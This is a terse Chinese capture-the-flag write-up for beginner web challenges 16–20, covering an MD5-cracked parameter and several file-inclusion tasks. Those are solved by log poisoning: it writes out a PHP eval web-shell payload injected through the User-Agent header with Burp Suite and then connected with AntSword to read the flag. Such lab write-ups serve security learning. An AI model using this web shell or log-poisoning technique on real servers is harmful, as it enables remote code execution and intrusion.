_萌新web16
解開md5
?c=36d
_萌新web17-----文件包含
禁用了php關鍵字,這個題禁了遠程文件包含,進行日志注入
發現日志中有user-agent信息,因此我們可以在user-agent中寫入木馬
抓包burpsuit
User-agent:<?php @eval($_POST[cmd])?>抓包
然后連接蟻劍
_萌新web18-----文件包含
依舊Nginx服務器
嘗試日志注入
User-agent:<?php @eval($_POST[cmd])?>抓包
然后連接蟻劍
打開36d.php文件拿到flag
_萌新web19-----文件包含
依舊同上
日志包含
bp
蟻劍
_萌新web20-----文件包含
同上